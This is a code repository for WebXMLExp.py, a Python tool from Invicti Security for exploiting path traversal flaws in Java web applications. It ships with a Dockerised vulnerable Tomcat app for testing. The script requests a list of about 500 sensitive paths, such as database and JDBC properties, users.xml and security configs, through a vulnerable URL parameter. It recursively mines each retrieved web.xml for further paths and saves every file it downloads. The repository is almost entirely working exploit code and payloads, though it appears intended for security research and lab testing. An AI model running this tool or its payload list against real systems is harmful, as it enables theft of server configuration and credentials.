├── LICENSE.md ├── WebXMLExp.py ├── docker ├── docker-compose.yml └── vulnerable.war ├── payloads.txt ├── readme.md └── requirements.txt /LICENSE.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Invicti Security 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /WebXMLExp.py: -------------------------------------------------------------------------------- 1 | # 2 | # 888 888 888 Y88b d88P 888b d888 888 8888888888 3 | # 888 o 888 888 Y88b d88P 8888b d8888 888 888 4 | # 888 d8b 888 888 Y88o88P 88888b.d88888 888 888 5 | # 888 d888b 888 .d88b. 88888b. Y888P 888Y88888P888 888 8888888 888 888 88888b. 
6 | # 888d88888b888 d8P Y8b 888 "88b d888b 888 Y888P 888 888 888 `Y8bd8P' 888 "88b 7 | # 88888P Y88888 88888888 888 888 d88888b 888 Y8P 888 888 888 X88K 888 888 8 | # 8888P Y8888 Y8b. 888 d88P d88P Y88b 888 " 888 888 888 .d8""8b. 888 d88P 9 | # 888P Y888 "Y8888 88888P" d88P Y88b 888 888 88888888 8888888888 888 888 88888P" 10 | # 888 11 | # 888 12 | # Copyright (c) 2022 Bogdan Calin (Invicti Security) 13 | # 14 | 15 | import requests, sys, string, random, hashlib, os, pathlib, urllib.parse 16 | import defusedxml.ElementTree as ET 17 | 18 | proxies = { 19 | # 'http': 'http://127.0.0.1:8080', 20 | # 'https': 'http://127.0.0.1:8080', 21 | } 22 | 23 | PAYLOAD_MARK = "" 24 | 25 | def sha256(input): 26 | return hashlib.sha256(input.encode()).hexdigest() 27 | 28 | def randomStr(count): 29 | return ''.join(random.choices(string.ascii_lowercase, k=count)) 30 | 31 | def getCustom404(orig_url): 32 | try: 33 | payload = "WEB-{0}/{1}.xml".format(randomStr(3).upper(), randomStr(5)) 34 | url = orig_url.replace(PAYLOAD_MARK, payload) 35 | resp = requests.get(url, proxies=proxies) 36 | body = resp.text.replace(payload, "*").replace(urllib.parse.quote(payload), '*') 37 | return (resp.status_code, sha256(body)) 38 | except BaseException as e: 39 | print("unable to determine custom404. maybe the URL is not valid? 
" + str(e)) 40 | return False 41 | 42 | def testPayload(orig_url, payload, custom404): 43 | url = orig_url.replace(PAYLOAD_MARK, payload) 44 | resp = requests.get(url, proxies=proxies) 45 | body = resp.text.replace(payload, "*").replace(urllib.parse.quote(payload), '*') 46 | if resp.status_code != custom404[0] or resp.status_code == custom404[0] and sha256(body) != custom404[1]: 47 | return resp 48 | else: 49 | return False 50 | 51 | def urlIsValid(orig_url, c404): 52 | p = testPayload(orig_url, "WEB-INF/web.xml", c404) 53 | if p and " 0: 92 | for v in values: 93 | if v not in payloads: 94 | payloads.append(v) 95 | if elem.tag.endswith("servlet-class"): 96 | path = extractPathFromClassName(elem.text, "WEB-INF") 97 | if path not in payloads: 98 | payloads.append(path) 99 | path2 = extractPathFromClassName(elem.text, "BOOT-INF") 100 | if path2 not in payloads: 101 | payloads.append(path2) 102 | if elem.tag.endswith("servlet-name"): 103 | path = "WEB-INF/{}-servlet.xml".format(elem.text) 104 | if path not in payloads: 105 | payloads.append(path) 106 | path = "WEB-INF/{}.properties".format(elem.text) 107 | if path not in payloads: 108 | payloads.append(path) 109 | path = "WEB-INF/{}-config.xml".format(elem.text) 110 | if path not in payloads: 111 | payloads.append(path) 112 | path = "WEB-INF/{}-config.yml".format(elem.text) 113 | if path not in payloads: 114 | payloads.append(path) 115 | path = "WEB-INF/{}-config.yaml".format(elem.text) 116 | if path not in payloads: 117 | payloads.append(path) 118 | path = "WEB-INF/classes/{}.properties".format(elem.text) 119 | if path not in payloads: 120 | payloads.append(path) 121 | path = "WEB-INF/{}.yml".format(elem.text) 122 | if path not in payloads: 123 | payloads.append(path) 124 | path = "WEB-INF/{}.yaml".format(elem.text) 125 | if path not in payloads: 126 | payloads.append(path) 127 | 128 | except: 129 | pass 130 | 131 | return payloads 132 | 133 | def saveResponse(response, payload): 134 | if payload.startswith("/"): 135 
| payload = payload[1:] 136 | 137 | path = os.path.join(os.getcwd(), "results", payload).replace("\\","/") 138 | 139 | safe_dir = os.getcwd() 140 | if os.path.commonprefix((os.path.realpath(path),safe_dir)) != safe_dir: 141 | print(f"Not writing results for invalid path \"{path}\" (hack not the hacker)") 142 | return 143 | 144 | print(" saving response to {}".format(path)) 145 | 146 | p = pathlib.Path(path) 147 | if not os.path.exists(p.parent): 148 | os.makedirs(p.parent) 149 | 150 | f = open(path, "w+", encoding='utf-8') 151 | f.write(response.text) 152 | f.close() 153 | 154 | def exploit(url, payloads): 155 | orig_url = url.replace("WEB-INF/web.xml", PAYLOAD_MARK) 156 | print("determine custom 404 ...") 157 | c404 = getCustom404(orig_url) 158 | 159 | if not c404: 160 | sys.exit() 161 | 162 | print("testing the exploit url ...") 163 | if not urlIsValid(orig_url, c404): 164 | print("exploit url is not valid! cannot find ' 0 and iterations < 5: 171 | iterations += 1 172 | print("testing {} payloads ...".format(len(payloads))) 173 | for payload in payloads: 174 | payloads.remove(payload) 175 | if payload not in processed_payloads: 176 | processed_payloads.append(payload) 177 | p = testPayload(orig_url, payload, c404) 178 | if p: 179 | q = testPayload(orig_url, randomStr(5) + payload, c404) 180 | if not q: 181 | z = testPayload(orig_url, payload + randomStr(5), c404) 182 | if not z: 183 | p = testPayload(orig_url, payload, c404) 184 | if p: 185 | print("> {0}".format(p.url)) 186 | saveResponse(p, payload) 187 | new_payloads = extractNewPayloadsFromResponse(p.text) 188 | if len(new_payloads) > 0: 189 | for np in new_payloads: 190 | if np not in processed_payloads and np not in payloads: 191 | payloads.append(np) 192 | 193 | # main() 194 | if __name__ == '__main__': 195 | if len(sys.argv) < 2: 196 | print("usage: python WebXMLExp.py ") 197 | print('example: python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml"') 198 | print(' 
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename="') 199 | sys.exit() 200 | 201 | url = sys.argv[1].strip() 202 | if url: 203 | # read payloads.txt 204 | payloads = [] 205 | with open("payloads.txt") as f: 206 | for line in f: 207 | line = line.strip() 208 | if line and line not in payloads: 209 | payloads.append(line) 210 | 211 | exploit(url, payloads) -------------------------------------------------------------------------------- /docker/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.3' 2 | services: 3 | vulnerable_web: 4 | image: tomcat:10.0 5 | volumes: 6 | - ./vulnerable.war:/usr/local/tomcat/webapps/vulnerable.war 7 | ports: 8 | - '8082:8080' 9 | -------------------------------------------------------------------------------- /docker/vulnerable.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Invicti-Security/web-inf-path-trav/c27ad7e68a154d991f5b4ed67ec19acaa35a41d9/docker/vulnerable.war -------------------------------------------------------------------------------- /payloads.txt: -------------------------------------------------------------------------------- 1 | WEB-INF/web.xml 2 | WEB-INF/jboss-web.xml 3 | WEB-INF/glassfish-web.xml 4 | WEB-INF/glassfish-resources.xml 5 | index.jsp 6 | login.jsp 7 | home.jsp 8 | redirect.jsp 9 | build.gradle 10 | application.properties 11 | config.json 12 | config/config.json 13 | default.properties 14 | app.properties 15 | db.properties 16 | database.properties 17 | dev.properties 18 | config.properties 19 | datasource.properties 20 | struts.properties 21 | log4j.properties 22 | ESAPI.properties 23 | user.properties 24 | app-default.properties 25 | classes/app.properties 26 | web-application-context.xml 27 | monitor-context.xml 28 | kpi-all.xml 29 | monitor-auth.properties 30 | web-mvc-context.xml 31 | WEB-INF/application-client.xml 32 | 
WEB-INF/application_config.xml 33 | WEB-INF/cas-servlet.xml 34 | WEB-INF/cas.properties 35 | WEB-INF/classes/app-config.xml 36 | WEB-INF/classes/application.yml 37 | WEB-INF/classes/applicationContext.xml 38 | WEB-INF/classes/cas-theme-default.properties 39 | WEB-INF/classes/commons-logging.properties 40 | WEB-INF/classes/config.properties 41 | WEB-INF/classes/countries.properties 42 | WEB-INF/classes/db.properties 43 | WEB-INF/classes/default-theme.properties 44 | WEB-INF/classes/default_views.properties 45 | WEB-INF/classes/demo.xml 46 | WEB-INF/classes/faces-config.xml 47 | WEB-INF/classes/fckeditor.properties 48 | WEB-INF/classes/hibernate.cfg.xml 49 | WEB-INF/classes/languages.xml 50 | WEB-INF/classes/log4j.properties 51 | WEB-INF/classes/logback.xml 52 | WEB-INF/classes/messages.properties 53 | WEB-INF/classes/META-INF/app-config.xml 54 | WEB-INF/classes/META-INF/persistence.xml 55 | WEB-INF/classes/mobile.xml 56 | WEB-INF/classes/persistence.xml 57 | WEB-INF/classes/protocol_views.properties 58 | WEB-INF/classes/resources/config.properties 59 | WEB-INF/classes/services.properties 60 | WEB-INF/classes/struts-default.vm 61 | WEB-INF/classes/struts.properties 62 | WEB-INF/classes/struts.xml 63 | WEB-INF/classes/theme.properties 64 | WEB-INF/classes/validation.properties 65 | WEB-INF/classes/velocity.properties 66 | WEB-INF/classes/web.xml 67 | WEB-INF/components.xml 68 | WEB-INF/conf/caches.dat 69 | WEB-INF/conf/caches.properties 70 | WEB-INF/conf/core.xml 71 | WEB-INF/conf/core_context.xml 72 | WEB-INF/conf/daemons.properties 73 | WEB-INF/conf/editors.properties 74 | WEB-INF/conf/jpa_context.xml 75 | WEB-INF/conf/jtidy.properties 76 | WEB-INF/conf/lutece.properties 77 | WEB-INF/conf/mime.types 78 | WEB-INF/conf/page_navigator.xml 79 | WEB-INF/conf/search.properties 80 | WEB-INF/conf/webmaster.properties 81 | WEB-INF/conf/wml.properties 82 | WEB-INF/config.xml 83 | WEB-INF/config/dashboard-statistics.xml 84 | WEB-INF/config/faces-config.xml 85 | 
WEB-INF/config/metadata.xml 86 | WEB-INF/config/mua-endpoints.xml 87 | WEB-INF/config/security.xml 88 | WEB-INF/config/soapConfig.xml 89 | WEB-INF/config/users.xml 90 | WEB-INF/config/web-core.xml 91 | WEB-INF/config/webflow-config.xml 92 | WEB-INF/config/webmvc-config.xml 93 | WEB-INF/decorators.xml 94 | WEB-INF/deployerConfigContext.xml 95 | WEB-INF/ejb-jar.xml 96 | WEB-INF/faces-config.xml 97 | WEB-INF/hibernate.cfg.xml 98 | WEB-INF/ias-web.xml 99 | WEB-INF/jax-ws-catalog.xml 100 | WEB-INF/jboss-client.xml 101 | WEB-INF/jboss-ejb-client.xml 102 | WEB-INF/jboss-ejb3.xml 103 | WEB-INF/jboss-webservices.xml 104 | WEB-INF/jetty-env.xml 105 | WEB-INF/jetty-web.xml 106 | WEB-INF/jrun-web.xml 107 | WEB-INF/local-jps.properties 108 | WEB-INF/local.xml 109 | WEB-INF/logback.xml 110 | WEB-INF/logs/log.log 111 | WEB-INF/openx-config.xml 112 | WEB-INF/portlet.xml 113 | WEB-INF/quartz-properties.xml 114 | WEB-INF/resources/config.properties 115 | WEB-INF/restlet-servlet.xml 116 | WEB-INF/service.xsd 117 | WEB-INF/sitemesh.xml 118 | WEB-INF/spring-config.xml 119 | WEB-INF/spring-config/application-context.xml 120 | WEB-INF/spring-config/authorization-config.xml 121 | WEB-INF/spring-config/management-config.xml 122 | WEB-INF/spring-config/messaging-config.xml 123 | WEB-INF/spring-config/presentation-config.xml 124 | WEB-INF/spring-config/services-config.xml 125 | WEB-INF/spring-config/services-remote-config.xml 126 | WEB-INF/spring-configuration/filters.xml 127 | WEB-INF/spring-context.xml 128 | WEB-INF/spring-dispatcher-servlet.xml 129 | WEB-INF/spring-mvc.xml 130 | WEB-INF/spring-ws-servlet.xml 131 | WEB-INF/spring/webmvc-config.xml 132 | WEB-INF/springweb-servlet.xml 133 | WEB-INF/struts-config-widgets.xml 134 | WEB-INF/sun-jaxws.xml 135 | WEB-INF/tjc-web.xml 136 | WEB-INF/trinidad-config.xml 137 | WEB-INF/validation.xml 138 | WEB-INF/validator-rules.xml 139 | WEB-INF/web-jetty.xml 140 | WEB-INF/web.xml.jsf 141 | WEB-INF/web2.xml 142 | WEB-INF/workflow-properties.xml 143 | 
WEB-INF/web-application-context.xml 144 | WEB-INF/monitor-context.xml 145 | WEB-INF/kpi-all.xml 146 | WEB-INF/monitor-auth.properties 147 | WEB-INF/web-mvc-context.xml 148 | WEB-INF/config/web-application-context.xml 149 | WEB-INF/config/monitor-context.xml 150 | WEB-INF/config/kpi-all.xml 151 | WEB-INF/config/monitor-auth.properties 152 | WEB-INF/config/web-mvc-context.xml 153 | WEB-INF/classes/web-application-context.xml 154 | WEB-INF/classes/monitor-context.xml 155 | WEB-INF/classes/kpi-all.xml 156 | WEB-INF/classes/monitor-auth.properties 157 | WEB-INF/classes/web-mvc-context.xml 158 | WEB-INF/lib/web-application-context.xml 159 | WEB-INF/lib/monitor-context.xml 160 | WEB-INF/lib/kpi-all.xml 161 | WEB-INF/lib/monitor-auth.properties 162 | WEB-INF/lib/web-mvc-context.xml 163 | WEB-INF/dispatcher-servlet.xml 164 | WEB-INF/beans.xml 165 | WEB-INF/views/index.jsp 166 | WEB-INF/views/home.jsp 167 | WEB-INF/views/login.jsp 168 | WEB-INF/spring/root-context.xml 169 | WEB-INF/spring/appServlet/servlet-context.xml 170 | WEB-INF/spring/context-root.xml 171 | WEB-INF/spring/context-mybatis.xml 172 | WEB-INF/lms.properties 173 | WEB-INF/application.properties 174 | WEB-INF/applicationContext.xml 175 | WEB-INF/applicationSecurity.xml 176 | WEB-INF/default.properties 177 | WEB-INF/jdbc.properties 178 | WEB-INF/db.properties 179 | WEB-INF/classes/mybatis-config.xml 180 | WEB-INF/classes/log4j.xml 181 | WEB-INF/classes/jdbc.properties 182 | WEB-INF/classes/application.properties 183 | WEB-INF/classes/springmvc.xml 184 | WEB-INF/classes/applicationContext_mapper.xml 185 | WEB-INF/classes/applicationContext_service.xml 186 | WEB-INF/geronimo-web.xml 187 | WEB-INF/ibm-web-bnd.xmi 188 | WEB-INF/ibm-web-ext.xmi 189 | WEB-INF/jboss-deployment-structure.xml 190 | WEB-INF/jboss-web.xml.5 191 | WEB-INF/jonas-web.xml 192 | WEB-INF/liferay-display.xml 193 | WEB-INF/liferay-layout-templates.xml 194 | WEB-INF/liferay-look-and-feel.xml 195 | WEB-INF/liferay-plugin-package.xml 196 | 
WEB-INF/liferay-portlet.xml 197 | WEB-INF/liferay-social.xml 198 | WEB-INF/liferay-web.xml 199 | WEB-INF/portlet-custom.xml 200 | WEB-INF/remoting-servlet.xml 201 | WEB-INF/resin-web.xml 202 | WEB-INF/rexip-web.xml 203 | WEB-INF/server-config.wsdd 204 | WEB-INF/struts-config-ext.xml 205 | WEB-INF/struts-config.xml 206 | WEB-INF/sun-web.xml 207 | WEB-INF/tiles-defs.xml 208 | WEB-INF/urlrewrite.xml 209 | WEB-INF/web-borland.xml 210 | WEB-INF/weblogic.xml 211 | WEB-INF/config.json 212 | WEB-INF/app.json 213 | WEB-INF/config/config.json 214 | WEB-INF/config/app.json 215 | WEB-INF/config/app.properties 216 | WEB-INF/config/default.properties 217 | WEB-INF/config/db.properties 218 | WEB-INF/config/database.properties 219 | WEB-INF/config/dev.properties 220 | WEB-INF/config/config.properties 221 | WEB-INF/config/datasource.properties 222 | WEB-INF/config/log4j.properties 223 | WEB-INF/config/ESAPI.properties 224 | WEB-INF/config/user.properties 225 | WEB-INF/config/struts.properties 226 | WEB-INF/config/app-default.properties 227 | WEB-INF/configs/app.properties 228 | WEB-INF/configs/default.properties 229 | WEB-INF/configs/db.properties 230 | WEB-INF/configs/database.properties 231 | WEB-INF/configs/dev.properties 232 | WEB-INF/configs/config.properties 233 | WEB-INF/configs/datasource.properties 234 | WEB-INF/configs/log4j.properties 235 | WEB-INF/configs/ESAPI.properties 236 | WEB-INF/configs/user.properties 237 | WEB-INF/configs/struts.properties 238 | WEB-INF/configs/app-default.properties 239 | WEB-INF/conf/app.properties 240 | WEB-INF/conf/default.properties 241 | WEB-INF/conf/db.properties 242 | WEB-INF/conf/database.properties 243 | WEB-INF/conf/dev.properties 244 | WEB-INF/conf/config.properties 245 | WEB-INF/conf/datasource.properties 246 | WEB-INF/conf/log4j.properties 247 | WEB-INF/conf/ESAPI.properties 248 | WEB-INF/conf/user.properties 249 | WEB-INF/conf/app-default.properties 250 | WEB-INF/conf/struts.properties 251 | META-INF/context.xml 252 | 
META-INF/app-config.xml 253 | META-INF/application-client.xml 254 | META-INF/application.xml 255 | META-INF/beans.xml 256 | META-INF/CERT.SF 257 | META-INF/container.xml 258 | META-INF/eclipse.inf 259 | META-INF/ejb-jar.xml 260 | META-INF/ironjacamar.xml 261 | META-INF/jboss-app.xml 262 | META-INF/jboss-client.xml 263 | META-INF/jboss-deployment-structure.xml 264 | META-INF/jboss-ejb-client.xml 265 | META-INF/jboss-ejb3.xml 266 | META-INF/jboss-webservices.xml 267 | META-INF/jbosscmp-jdbc.xml 268 | META-INF/MANIFEST.MF 269 | META-INF/openwebbeans/openwebbeans.properties 270 | META-INF/persistence.xml 271 | META-INF/ra.xml 272 | META-INF/SOFTWARE.SF 273 | META-INF/spring/application-context.xml 274 | META-INF/weblogic-application.xml 275 | META-INF/weblogic-ejb-jar.xml 276 | JNLP-INF/APPLICATION.JNLP 277 | web-application-context.yml 278 | web-mvc-context.yml 279 | WEB-INF/application-client.yml 280 | WEB-INF/application_config.yml 281 | WEB-INF/classes/app-config.yml 282 | WEB-INF/classes/applicationContext.yml 283 | web-application-context.yaml 284 | web-mvc-context.yaml 285 | WEB-INF/application-client.yaml 286 | WEB-INF/application_config.yaml 287 | WEB-INF/classes/app-config.yaml 288 | WEB-INF/classes/application.yaml 289 | WEB-INF/classes/applicationContext.yaml 290 | WEB-INF/spring/root-context.yaml 291 | WEB-INF/spring/appServlet/servlet-context.yaml 292 | WEB-INF/spring/context-root.yaml 293 | WEB-INF/spring/context-mybatis.yaml 294 | WEB-INF/spring/root-context.yml 295 | WEB-INF/spring/appServlet/servlet-context.yml 296 | WEB-INF/spring/context-root.yml 297 | WEB-INF/spring/context-mybatis.yml 298 | BOOT-INF/application-client.xml 299 | BOOT-INF/application_config.xml 300 | BOOT-INF/cas-servlet.xml 301 | BOOT-INF/cas.properties 302 | BOOT-INF/classes/app-config.xml 303 | BOOT-INF/classes/application.yml 304 | BOOT-INF/classes/applicationContext.xml 305 | BOOT-INF/classes/cas-theme-default.properties 306 | BOOT-INF/classes/commons-logging.properties 307 | 
BOOT-INF/classes/config.properties 308 | BOOT-INF/classes/countries.properties 309 | BOOT-INF/classes/db.properties 310 | BOOT-INF/classes/default-theme.properties 311 | BOOT-INF/classes/default_views.properties 312 | BOOT-INF/classes/demo.xml 313 | BOOT-INF/classes/faces-config.xml 314 | BOOT-INF/classes/fckeditor.properties 315 | BOOT-INF/classes/hibernate.cfg.xml 316 | BOOT-INF/classes/languages.xml 317 | BOOT-INF/classes/log4j.properties 318 | BOOT-INF/classes/logback.xml 319 | BOOT-INF/classes/messages.properties 320 | BOOT-INF/classes/META-INF/app-config.xml 321 | BOOT-INF/classes/META-INF/persistence.xml 322 | BOOT-INF/classes/mobile.xml 323 | BOOT-INF/classes/persistence.xml 324 | BOOT-INF/classes/protocol_views.properties 325 | BOOT-INF/classes/resources/config.properties 326 | BOOT-INF/classes/services.properties 327 | BOOT-INF/classes/struts-default.vm 328 | BOOT-INF/classes/struts.properties 329 | BOOT-INF/classes/struts.xml 330 | BOOT-INF/classes/theme.properties 331 | BOOT-INF/classes/validation.properties 332 | BOOT-INF/classes/velocity.properties 333 | BOOT-INF/classes/web.xml 334 | BOOT-INF/components.xml 335 | BOOT-INF/conf/caches.dat 336 | BOOT-INF/conf/caches.properties 337 | BOOT-INF/conf/core.xml 338 | BOOT-INF/conf/core_context.xml 339 | BOOT-INF/conf/daemons.properties 340 | BOOT-INF/conf/editors.properties 341 | BOOT-INF/conf/jpa_context.xml 342 | BOOT-INF/conf/jtidy.properties 343 | BOOT-INF/conf/lutece.properties 344 | BOOT-INF/conf/mime.types 345 | BOOT-INF/conf/page_navigator.xml 346 | BOOT-INF/conf/search.properties 347 | BOOT-INF/conf/webmaster.properties 348 | BOOT-INF/conf/wml.properties 349 | BOOT-INF/config.xml 350 | BOOT-INF/config/dashboard-statistics.xml 351 | BOOT-INF/config/faces-config.xml 352 | BOOT-INF/config/metadata.xml 353 | BOOT-INF/config/mua-endpoints.xml 354 | BOOT-INF/config/security.xml 355 | BOOT-INF/config/soapConfig.xml 356 | BOOT-INF/config/users.xml 357 | BOOT-INF/config/web-core.xml 358 | 
BOOT-INF/config/webflow-config.xml 359 | BOOT-INF/config/webmvc-config.xml 360 | BOOT-INF/decorators.xml 361 | BOOT-INF/deployerConfigContext.xml 362 | BOOT-INF/ejb-jar.xml 363 | BOOT-INF/faces-config.xml 364 | BOOT-INF/hibernate.cfg.xml 365 | BOOT-INF/ias-web.xml 366 | BOOT-INF/jax-ws-catalog.xml 367 | BOOT-INF/jboss-client.xml 368 | BOOT-INF/jboss-ejb-client.xml 369 | BOOT-INF/jboss-ejb3.xml 370 | BOOT-INF/jboss-webservices.xml 371 | BOOT-INF/jetty-env.xml 372 | BOOT-INF/jetty-web.xml 373 | BOOT-INF/jrun-web.xml 374 | BOOT-INF/local-jps.properties 375 | BOOT-INF/local.xml 376 | BOOT-INF/logback.xml 377 | BOOT-INF/logs/log.log 378 | BOOT-INF/openx-config.xml 379 | BOOT-INF/portlet.xml 380 | BOOT-INF/quartz-properties.xml 381 | BOOT-INF/resources/config.properties 382 | BOOT-INF/restlet-servlet.xml 383 | BOOT-INF/service.xsd 384 | BOOT-INF/sitemesh.xml 385 | BOOT-INF/spring-config.xml 386 | BOOT-INF/spring-config/application-context.xml 387 | BOOT-INF/spring-config/authorization-config.xml 388 | BOOT-INF/spring-config/management-config.xml 389 | BOOT-INF/spring-config/messaging-config.xml 390 | BOOT-INF/spring-config/presentation-config.xml 391 | BOOT-INF/spring-config/services-config.xml 392 | BOOT-INF/spring-config/services-remote-config.xml 393 | BOOT-INF/spring-configuration/filters.xml 394 | BOOT-INF/spring-context.xml 395 | BOOT-INF/spring-dispatcher-servlet.xml 396 | BOOT-INF/spring-mvc.xml 397 | BOOT-INF/spring-ws-servlet.xml 398 | BOOT-INF/spring/webmvc-config.xml 399 | BOOT-INF/springweb-servlet.xml 400 | BOOT-INF/struts-config-widgets.xml 401 | BOOT-INF/sun-jaxws.xml 402 | BOOT-INF/tjc-web.xml 403 | BOOT-INF/trinidad-config.xml 404 | BOOT-INF/validation.xml 405 | BOOT-INF/validator-rules.xml 406 | BOOT-INF/web-jetty.xml 407 | BOOT-INF/web.xml.jsf 408 | BOOT-INF/web2.xml 409 | BOOT-INF/workflow-properties.xml 410 | BOOT-INF/web-application-context.xml 411 | BOOT-INF/monitor-context.xml 412 | BOOT-INF/kpi-all.xml 413 | BOOT-INF/monitor-auth.properties 414 
| BOOT-INF/web-mvc-context.xml 415 | BOOT-INF/config/web-application-context.xml 416 | BOOT-INF/config/monitor-context.xml 417 | BOOT-INF/config/kpi-all.xml 418 | BOOT-INF/config/monitor-auth.properties 419 | BOOT-INF/config/web-mvc-context.xml 420 | BOOT-INF/classes/web-application-context.xml 421 | BOOT-INF/classes/monitor-context.xml 422 | BOOT-INF/classes/kpi-all.xml 423 | BOOT-INF/classes/monitor-auth.properties 424 | BOOT-INF/classes/web-mvc-context.xml 425 | BOOT-INF/lib/web-application-context.xml 426 | BOOT-INF/lib/monitor-context.xml 427 | BOOT-INF/lib/kpi-all.xml 428 | BOOT-INF/lib/monitor-auth.properties 429 | BOOT-INF/lib/web-mvc-context.xml 430 | BOOT-INF/dispatcher-servlet.xml 431 | BOOT-INF/beans.xml 432 | BOOT-INF/views/index.jsp 433 | BOOT-INF/views/home.jsp 434 | BOOT-INF/views/login.jsp 435 | BOOT-INF/spring/root-context.xml 436 | BOOT-INF/spring/appServlet/servlet-context.xml 437 | BOOT-INF/spring/context-root.xml 438 | BOOT-INF/spring/context-mybatis.xml 439 | BOOT-INF/lms.properties 440 | BOOT-INF/application.properties 441 | BOOT-INF/applicationContext.xml 442 | BOOT-INF/applicationSecurity.xml 443 | BOOT-INF/default.properties 444 | BOOT-INF/jdbc.properties 445 | BOOT-INF/db.properties 446 | BOOT-INF/classes/mybatis-config.xml 447 | BOOT-INF/classes/log4j.xml 448 | BOOT-INF/classes/jdbc.properties 449 | BOOT-INF/classes/application.properties 450 | BOOT-INF/classes/springmvc.xml 451 | BOOT-INF/classes/applicationContext_mapper.xml 452 | BOOT-INF/classes/applicationContext_service.xml 453 | BOOT-INF/geronimo-web.xml 454 | BOOT-INF/ibm-web-bnd.xmi 455 | BOOT-INF/ibm-web-ext.xmi 456 | BOOT-INF/jboss-deployment-structure.xml 457 | BOOT-INF/jboss-web.xml.5 458 | BOOT-INF/jonas-web.xml 459 | BOOT-INF/liferay-display.xml 460 | BOOT-INF/liferay-layout-templates.xml 461 | BOOT-INF/liferay-look-and-feel.xml 462 | BOOT-INF/liferay-plugin-package.xml 463 | BOOT-INF/liferay-portlet.xml 464 | BOOT-INF/liferay-social.xml 465 | BOOT-INF/liferay-web.xml 466 
| BOOT-INF/portlet-custom.xml 467 | BOOT-INF/remoting-servlet.xml 468 | BOOT-INF/resin-web.xml 469 | BOOT-INF/rexip-web.xml 470 | BOOT-INF/server-config.wsdd 471 | BOOT-INF/struts-config-ext.xml 472 | BOOT-INF/struts-config.xml 473 | BOOT-INF/sun-web.xml 474 | BOOT-INF/tiles-defs.xml 475 | BOOT-INF/urlrewrite.xml 476 | BOOT-INF/web-borland.xml 477 | BOOT-INF/weblogic.xml 478 | BOOT-INF/config.json 479 | BOOT-INF/app.json 480 | BOOT-INF/config/config.json 481 | BOOT-INF/config/app.json 482 | BOOT-INF/config/app.properties 483 | BOOT-INF/config/default.properties 484 | BOOT-INF/config/db.properties 485 | BOOT-INF/config/database.properties 486 | BOOT-INF/config/dev.properties 487 | BOOT-INF/config/config.properties 488 | BOOT-INF/config/datasource.properties 489 | BOOT-INF/config/log4j.properties 490 | BOOT-INF/config/ESAPI.properties 491 | BOOT-INF/config/user.properties 492 | BOOT-INF/config/struts.properties 493 | BOOT-INF/config/app-default.properties 494 | BOOT-INF/configs/app.properties 495 | BOOT-INF/configs/default.properties 496 | BOOT-INF/configs/db.properties 497 | BOOT-INF/configs/database.properties 498 | BOOT-INF/configs/dev.properties 499 | BOOT-INF/configs/config.properties 500 | BOOT-INF/configs/datasource.properties 501 | BOOT-INF/configs/log4j.properties 502 | BOOT-INF/configs/ESAPI.properties 503 | BOOT-INF/configs/user.properties 504 | BOOT-INF/configs/struts.properties 505 | BOOT-INF/configs/app-default.properties 506 | BOOT-INF/conf/app.properties 507 | BOOT-INF/conf/default.properties 508 | BOOT-INF/conf/db.properties 509 | BOOT-INF/conf/database.properties 510 | BOOT-INF/conf/dev.properties 511 | BOOT-INF/conf/config.properties 512 | BOOT-INF/conf/datasource.properties 513 | BOOT-INF/conf/log4j.properties 514 | BOOT-INF/conf/ESAPI.properties 515 | BOOT-INF/conf/user.properties 516 | BOOT-INF/conf/app-default.properties 517 | BOOT-INF/conf/struts.properties -------------------------------------------------------------------------------- 
/readme.md: -------------------------------------------------------------------------------- 1 | ### WebXMLExp.py 2 | 3 | Tool for helping in the exploitation of path traversal vulnerabilities in Java web applications. 4 | 5 | This tool is referenced in the Invicti Security white paper [Exploiting path traversal vulnerabilities in Java web applications](https://www.invicti.com/white-papers/exploiting-path-traversal-vulnerabilities-java-web-applications-technical-paper/). 6 | 7 | ## Install 8 | 9 | Python 3 is required for this tool. 10 | 11 | Run the following command: 12 | ``` 13 | pip install -r requirements.txt 14 | ``` 15 | ## Usage 16 | 17 | After installation, provide an exploit URL like so: 18 | ``` 19 | usage: python WebXMLExp.py 20 | ``` 21 | 22 | The results (the files that were downloaded) are written to the **results** folder. 23 | 24 | ### Examples 25 | 26 | ``` 27 | python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml" 28 | python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=" 29 | ``` 30 | 31 | ## Vulnerable web application docker image 32 | 33 | A web application with a path traversal vulnerability is provided in the **docker** folder. 34 | 35 | To start it, enter the **docker** folder and run: 36 | 37 | ``` 38 | docker-compose up 39 | ``` 40 | 41 | The application is accessible at **http://127.0.0.1:8082/vulnerable/**. 42 | 43 | To exploit the path traversal vulnerability visit: 44 | http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml 45 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | defusedxml --------------------------------------------------------------------------------